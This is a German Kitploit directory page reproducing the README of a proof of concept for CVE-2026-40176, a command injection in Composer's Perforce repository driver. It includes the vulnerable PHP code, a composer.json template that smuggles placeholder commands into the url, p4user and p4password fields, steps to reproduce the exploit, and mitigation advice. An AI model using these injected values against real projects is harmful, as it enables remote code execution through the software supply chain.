Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2026-40176-cve-2026-40261 — Proof-of-Concept, das eine Befehlsinjektion im Perforce-Treiber von Composer demonstriert (CVE-2026-40176), die Remote-Codeausführung über eine manipulierte Repository-Konfiguration ermöglicht. | Kitploit
Tools/GitHubGitHub/dapthehuman/cve-2026-40176-cve-2026-40261
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCommand and ControlPayload-Entwicklung
GitHubdapthehuman/cve-2026-40176-cve-2026-40261

cve-2026-40176-cve-2026-40261

Proof-of-Concept, das eine Befehlsinjektion im Perforce-Treiber von Composer demonstriert (CVE-2026-40176), die Remote-Codeausführung über eine manipulierte Repository-Konfiguration ermöglicht.

Repository anzeigen
4vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-40176

Composer Perforce Repository Remote Code Execution (RCE)

Composer Version Severity Type


📋 Zusammenfassung

Command Injection-Schwachstelle im Perforce-Repository-Treiber von Composer, die Remote Code Execution (RCE) durch unzureichende Eingabevalidierung bei der Verarbeitung von Repository-URLs ermöglicht.


🎯 Schwachstellendetails

EigenschaftWert
CVE-IDCVE-2026-40176
Betroffene VersionenComposer < 2.2.27
SchwachstellentypCommand Injection
AngriffsvektorBösartige Repository-Konfiguration
AuswirkungBeliebige Codeausführung
CVSS-ScoreHoch/Kritisch

🔍 Technische Beschreibung

Die Schwachstelle besteht darin, wie Composer den Typ perforce verarbeitet. Der Parameter wird nicht ordnungsgemäß bereinigt, bevor er an Shell-Befehle übergeben wird, sodass Angreifer beliebige Systembefehle einschleusen können.

root@kitploit:~

    public function generateP4Command($command, $useClient = true)
    {
        $p4Command = 'p4 ';
        $p4Command .= '-u ' . $this->getUser() . ' ';
        if ($useClient) 
            $p4Command .= '-c ' . $this->getClient() . ' ';
        }
        $p4Command .= '-p ' . $this->getPort() . ' ' . $command;

        return $p4Command;
    }

Alles davon wurde nicht ordnungsgemäß maskiert, sodass ein Angreifer Befehle einschleusen kann, indem er eine bösartige Nutzlast für alle Felder mit dem Typ perforce erstellt.

Verwundbares Code-Muster:

root@kitploit:~
{
  "repositories": [
    {
      "type": "perforce",
      "url": "PERFORCE_URL; INJECTED_COMMAND #",
      "depot": "depot",
      "p4user": "user; INJECRTED_COMMAND #",
      "p4password": "password; INJECTED_COMMAND #",
    }
  ]
}

🚀 Proof of Concept

Dieses Repository enthält einen funktionierenden Proof-of-Concept, der die Schwachstelle demonstriert.

Projektstruktur

root@kitploit:~
CVE-2026-40176/
├── composer.json              # Bösartige Perforce-Repository-Konfiguration
├── vuln-composer.phar         # Composer 2.2.26 (VERWUNDBAR)
├── patched-composer.phar      # Composer 2.2.27 (GEPATCHT)
└── README.md                  # Diese Datei

Reproduktionsschritte

1. Repository klonen

root@kitploit:~
git clone <repository-url>
cd CVE-2026-40176

2. Composer-Versionen überprüfen

root@kitploit:~
php vuln-composer.phar --version
# Ausgabe: Composer version 2.2.26

php patched-composer.phar --version
# Ausgabe: Composer version 2.2.27

3. Verwundbare Version testen

root@kitploit:~
php vuln-composer.phar install
# ODER
php vuln-composer.phar update

4. Ausnutzung verifizieren

root@kitploit:~
ls -la /tmp/pwned

5. Gepatchte Version testen (sollte fehlschlagen)

root@kitploit:~
rm -f /tmp/pwned
php patched-composer.phar update
ls -la /tmp/pwned
# Datei sollte NICHT existieren (Schwachstelle ist gepatcht)

🛡️ Abhilfemaßnahmen

Sofortmaßnahmen

  1. Composer aktualisieren auf Version 2.2.27 oder höher:

    root@kitploit:~
    composer self-update --2.2.27
    # ODER
    wget https://getcomposer.org/download/2.2.27/composer.phar
    
  2. Alle composer.json-Dateien überprüfen auf unbekannte oder verdächtige Repository-Konfigurationen

  3. Lieferkette prüfen – Prüfen, ob Abhängigkeiten auf nicht vertrauenswürdige Repositories verweisen

Erkennung

root@kitploit:~
# Composer-Version prüfen
composer --version

# Nach Perforce-Repositories in Ihren Projekten suchen
grep -r "perforce" */composer.json
Tool herunterladen